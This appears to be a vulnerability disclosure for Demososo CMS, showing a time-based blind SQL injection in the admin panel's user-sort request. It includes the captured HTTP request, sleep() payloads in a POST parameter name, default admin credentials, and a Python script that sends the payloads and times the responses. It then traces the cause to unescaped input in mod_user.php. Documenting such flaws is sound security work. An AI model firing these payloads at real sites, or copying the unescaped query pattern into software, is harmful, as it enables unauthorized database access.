Demososo-code-audit

Demososo CMS SQL injection.

SQL injection

After installing this CMS, open the admin panel at /dmqyjz_v20190822/admindm-yourname/g.php

Log in with the default credentials admin:admin123

Click the button in the upper right corner (circled in red in the screenshot)

or visit /dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php?lang=cn directly

Click the button circled in red (the sort/order submit button)

With Burp Suite's Intercept switched on, submit the form and catch the request:

POST /dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php?lang=cn&file=list&act=pos HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php?lang=cn
Cookie: UM_distinctid=16cfc4a88ff268-067ca10ef68b488-1262694a-1fa400-16cfc4a890029a; CNZZDATA1256279252=1005958402-1567599470-http%253A%252F%252Flocalhost%252F%7C1567599470; usercookie=77-5ed9412c29c00eda8c8eca41483d82f6; isadmin=y; admindir=admindm-yourname; username=admin; PHPSESSID=1sean1pmkvo9o10v44mub0a8b3
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

99=50&Submit=%E6%8E%92%E5%BA%8F

Send this request to Repeater so that the responses for different payloads can be compared side by side.

The injection point is the POST parameter name (the user id 99); modify it and watch how the response time changes.

Payloads:

99'%09or%09sleep(1)#=50&Submit=%E6%8E%92%E5%BA%8F

99'%09or%09sleep(5)#=50&Submit=%E6%8E%92%E5%BA%8F

99'%09or%09sleep(10)#=50&Submit=%E6%8E%92%E5%BA%8F

%09 is a URL-encoded tab used as whitespace, so the server decodes the key to 99' or sleep(N)#, where the single quote closes the string literal and # comments out the rest of the query. The response is held for roughly 1, 5 and 10 seconds respectively, and the delay scales with the argument to sleep().

Because the delay is controlled by the injected value, the parameter reaches MySQL unescaped: this is a time-based blind SQL injection.
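The timing check described above, written out as a script so it can be repeated without Burp. This is an added example, not code from the Demososo repository: TARGET, the parameter layout and the Submit value are taken from the intercepted request, the cookie values are placeholders that must be replaced with a live admin session, and simulated_send() is a constructed stand-in for the server so the script also runs offline.

```python
"""Time-based blind SQL injection check for the mod_user.php act=pos request.

Added example, not code from the Demososo project. TARGET, the parameter
layout and the Submit value come from the intercepted request; COOKIE holds
placeholder session values that must be replaced with a live admin session
before http_send() is used against a real install.
"""
import re
import time
import urllib.parse
import urllib.request

TARGET = ("http://localhost/dmqyjz_v20190822/admindm-yourname/mod_account/"
          "mod_user.php?lang=cn&file=list&act=pos")
# Placeholder session cookie; copy the real values from the intercepted request.
COOKIE = ("usercookie=REPLACE_ME; isadmin=y; admindir=admindm-yourname; "
          "username=admin; PHPSESSID=REPLACE_ME")
SUBMIT = "\u6392\u5e8f"  # the sort button value, %E6%8E%92%E5%BA%8F on the wire


def build_body(delay=None):
    """Build the POST body; with a delay, the user-id key carries the sleep() payload.

    The tabs are encoded as %09 exactly as in the Burp payloads; the server
    decodes the key back to 99' or sleep(N)#.
    """
    key = "99" if delay is None else "99'\tor\tsleep(%d)#" % delay
    return urllib.parse.urlencode({key: "50", "Submit": SUBMIT})


def http_send(body):
    """Send one request to the real target and return the elapsed seconds."""
    req = urllib.request.Request(TARGET, data=body.encode("utf-8"), method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("Cookie", COOKIE)
    start = time.perf_counter()
    with urllib.request.urlopen(req, timeout=60) as resp:
        resp.read()
    return time.perf_counter() - start


def measure(send, delays=(1, 5, 10), samples=2):
    """Return {0: baseline, delay: elapsed, ...}, keeping the fastest of `samples`
    tries per payload so that network jitter cannot inflate a timing."""
    timings = {0: min(send(build_body()) for _ in range(samples))}
    for d in delays:
        timings[d] = min(send(build_body(d)) for _ in range(samples))
    return timings


def is_time_based_sqli(send, delays=(1, 5, 10), tolerance=0.5):
    """True when every sleep(N) payload holds the response at least about N seconds
    longer than the baseline request. sleep() in a WHERE clause runs once per row
    examined, so the real delay may be a multiple of N; only a lower bound is checked."""
    timings = measure(send, delays)
    base = timings[0]
    return all(timings[d] - base >= d - tolerance for d in delays)


def simulated_send(body):
    """Offline stand-in for http_send(): a constructed fake server that reports the
    delay a vulnerable MySQL backend would add, without actually sleeping."""
    match = re.search(r"sleep\((\d+)\)", urllib.parse.unquote_plus(body))
    return 0.05 + (int(match.group(1)) if match else 0)


if __name__ == "__main__":
    # Swap simulated_send for http_send to test a real installation.
    print("time-based SQLi:", is_time_based_sqli(simulated_send))
```

Run it as-is to see the check pass against the simulated backend; pass http_send instead of simulated_send (after filling in COOKIE) to repeat the measurement against a local install. The baseline request is measured first so that a slow server on its own is not mistaken for an injection.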

What causes the SQL injection

In /dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php, line 42:

$v is taken from the request and sent to MySQL directly, without escaping, casting to an integer, or a prepared statement, so the injected value becomes part of the query as-is.